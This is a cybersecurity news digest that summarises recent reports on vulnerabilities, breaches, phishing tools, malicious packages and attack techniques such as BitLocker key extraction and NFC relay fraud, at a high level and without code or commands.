Protecting Web-based Work: Connecting People, Web Browsers and Security

Web browsers are essential for modern work but pose security risks as organizations shift to hybrid models. Security measures lag behind, leading to breaches and financial losses. A high percentage of workplaces face browser-based attacks, highlighting the need for advanced security like SASE frameworks and enterprise browsers that mitigate risks from personal devices. Proactive measures, including zero-trust architecture and ongoing employee training, are crucial for safeguarding sensitive data and fostering a resilient cybersecurity posture.

Protecting Web-Based Work: Connecting People, Web Browsers and Security

Over 4,000 Backdoors Hijacked by Registering Expired Domains

,

Over 4,000 backdoors hijacked via expired domains; researchers at WatchTowr Labs sinkholed communication from compromised systems, preventing further malicious use. They identified numerous infected systems, including government and educational institutions in multiple countries. Control of the hijacked domains was transferred to The Shadowserver Foundation for ongoing monitoring.

Over 4,000 backdoors hijacked by registering expired domains

SonicWall Urges Admins to Patch Exploitable SSLVPN Bug Immediately

,

SonicWall advises immediate firmware updates to fix a critical SSLVPN authentication bypass vulnerability (CVE-2024-53704, CVSS 8.2) affecting certain firewall models. Patches are available to prevent exploitation. Additional vulnerabilities noted include weak PRNG in SSL VPN tokens, SSRF in SSH management, and privilege escalation in cloud editions. Users should upgrade to specified SonicOS versions and limit access to mitigate risks.

SonicWall urges admins to patch exploitable SSLVPN bug immediately

Telegram Hands over Data on Thousands of Users to Us Law Enforcement

Telegram shares data on 2,253 users with U.S. law enforcement following a policy shift, fulfilling 900 requests in 2024, up from only 14 requests before. The change comes after pressure from authorities and the arrest of founder Pavel Durov for cybercrime-related charges. Telegram now cooperates on various crimes beyond terrorism, despite cybercriminals expressing concerns about leaving the platform. An updated transparency report is expected in April 2025.

Telegram hands over data on thousands of users to US law enforcement

New PhishWP Plugin Enables Sophisticated Payment Page Scams

,

New PhishWP plugin enables creation of fake payment pages, allowing cybercriminals to steal sensitive data. It mimics trusted services like Stripe, collecting credit card info and OTPs, sending this data to attackers via Telegram. PhishWP can compromise existing WordPress sites or create fraudulent ones, making scams difficult to detect. It features customizable checkouts, data collection capabilities, and real-time data transmission, posing a significant security threat. Experts recommend using advanced phishing protection tools to combat such scams.

New PhishWP Plugin Enables Sophisticated Payment Page Scams

Weaponizing Oast: How Malicious Packages Exploit Npm, Pypi, …

Malicious packages in npm, PyPI, and RubyGems exploit Out-of-Band Application Security Testing (OAST) techniques for data exfiltration. Threat actors leverage services like oastify.com to stealthily extract sensitive data and probe developer environments. Examples include a spoofed npm package (adobe-dcapi-web) designed to bypass detection, a typosquatted PyPI package (monoliht) for silent metadata collection, and various RubyGems targeting user information via DNS queries. These techniques pose significant risks, emphasizing the need for enhanced security measures in software supply chains.

Weaponizing OAST: How Malicious Packages Exploit npm, PyPI, …

Breaking Encryption: How to Prepare for Tomorrow’s Quantum Risk Today

,

Quantum computing threatens current encryption methods, risking sensitive data security. Organizations must prepare now by upgrading encryption to new post-quantum standards. Key steps include assessing exposure, adopting new encryption practices, remaining adaptable to evolving standards, and increasing awareness of quantum risks. This proactive approach helps safeguard data against future quantum capabilities.

Breaking Encryption: How To Prepare For Tomorrow's Quantum Risk Today

AI-generated Phishing Emails Are Getting Very Good at Targeting Executives

,

AI-generated phishing emails are increasingly targeting corporate executives. Companies like Beazley and eBay report a rise in hyper-personalized scams using personal details gathered via AI analysis. Experts highlight that AI enables hackers to craft convincing phishing emails that bypass security measures. Phishing is the starting point for over 90% of cyberattacks, with the global cost of data breaches rising. AI's role in identifying vulnerabilities enhances the sophistication of these scams, making them more difficult to detect.

AI-generated phishing emails are getting very good at targeting executives

Windows 11 Bitlocker Encryption Bypassed to Extract Volume Encryption Keys

,

Researchers have bypassed Windows 11's BitLocker encryption, extracting Full Volume Encryption Keys (FVEKs) from RAM during physical access attacks. This vulnerability arises from capturing memory contents during system operation, allowing key retrieval. Techniques, such as maintaining power to RAM, are used to prevent data loss during attacks. Secure Boot, while protective, has known bypass methods. Key extraction involves creating a bootable USB, restarting the system, and analyzing memory dumps for sensitive data. Despite Microsoft's security measures, residual keys can remain in memory, emphasizing that no encryption is entirely secure against physical access. Users should enhance hardware security and organizations should improve physical access controls.

Windows 11 BitLocker Encryption Bypassed To Extract Volume Encryption Keys

New Doubleclickjacking Attack Exploits Double-clicks to Hijack Accounts

New “DoubleClickjacking” attack hijacks accounts via deceptive double-clicks, bypassing traditional defenses. Attackers create a mask that tricks users into clicking hidden buttons on legitimate sites. This can authorize harmful actions without iframe use. Vulnerable sites include major platforms like Shopify and Slack. Protection suggestions include JavaScript to disable sensitive buttons and HTTP headers to limit quick window switching.

New DoubleClickjacking attack exploits double-clicks to hijack accounts

SysBumps – New Kernel Break Attack Bypassing macOS Systems Security

Researchers from Korea University exposed “SysBumps,” an attack on macOS systems using Apple Silicon. It exploits speculative execution vulnerabilities to bypass Kernel Address Space Layout Randomization (KASLR), a key security feature. By manipulating system calls and using the Translation Lookaside Buffer (TLB) as a side channel, attackers can accurately map kernel memory, achieving over 96% success in locating the kernel base address. This undermines existing kernel isolation techniques. Apple is investigating, and proposed countermeasures include TLB partitioning and code reordering. Users are advised to keep systems updated for future fixes.

https://cybersecuritynews.com/sysbumps/

It’s Only a Matter of Time Before LLMs Jump Start Supply-chain Attacks

,

LLMs may enhance supply-chain attacks by aiding social engineering, particularly spear phishing. Criminals can exploit existing LLMs rather than creating their own, making attacks more feasible. In 2025, targeted scams based on personal data could rise significantly, as attackers craft convincing messages. Previous incidents, like the Change Healthcare ransomware attack, underscore the potential impacts. Security tools are emerging, but users must remain vigilant against phishing and voice cloning scams. Effective prevention includes careful scrutiny of emails and communications.

https://www.theregister.com/2024/12/29/llm_supply_chain_attacks/

Customer Data From 800,000 Electric Cars and Owners Exposed Online

,

Data from 800,000 electric cars owned by Volkswagen, Seat, Audi, and Skoda was exposed online due to misconfigured Amazon cloud storage. The leak revealed detailed vehicle info, including precise location data, notable for its accuracy. Ethical hackers informed Volkswagen's software company, Cariad, of the vulnerability. Although access required technical expertise, some sensitive data was linked to high-profile individuals, raising privacy concerns. Cariad claims the issue was quickly resolved, with no evidence of data misuse by others found.

Customer data from 800,000 electric cars and owners exposed online

Cyberhaven Chrome Extension Compromised in Targeted Attack

Cyberhaven Chrome extension compromised in targeted attack on December 24, 2024. Attacker accessed employee account, published malicious version (24.10.4) on Chrome Web Store. Detected and removed within 60 minutes on December 25. Users at risk of sensitive data exfiltration. Recommendations: update to version 24.10.5+, rotate passwords, revoke API tokens, and check logs. Extensions on Firefox and Edge unaffected. Cyberhaven engaging Federal Law Enforcement and Mandiant for investigation.

Cyberhaven Chrome Extension Compromised in Targeted Attack

Ghost Tap: New Cash-out Tactic with Nfc Relay

,

Ghost Tap: New cash-out tactic using NFC Relay
Fraudsters adopt “Ghost Tap”, relaying NFC traffic for cash-outs using stolen card details linked to mobile payments. This technique, leveraging NFCGate, enables cybercriminals to perform transactions anonymously at retail locations, enhancing scalability. Detection challenges arise due to transaction patterns and lack of device presence at POS terminals, necessitating improved anti-fraud measures in financial institutions to combat this emerging threat.

Ghost Tap: New cash-out tactic with NFC Relay

Scroll to Top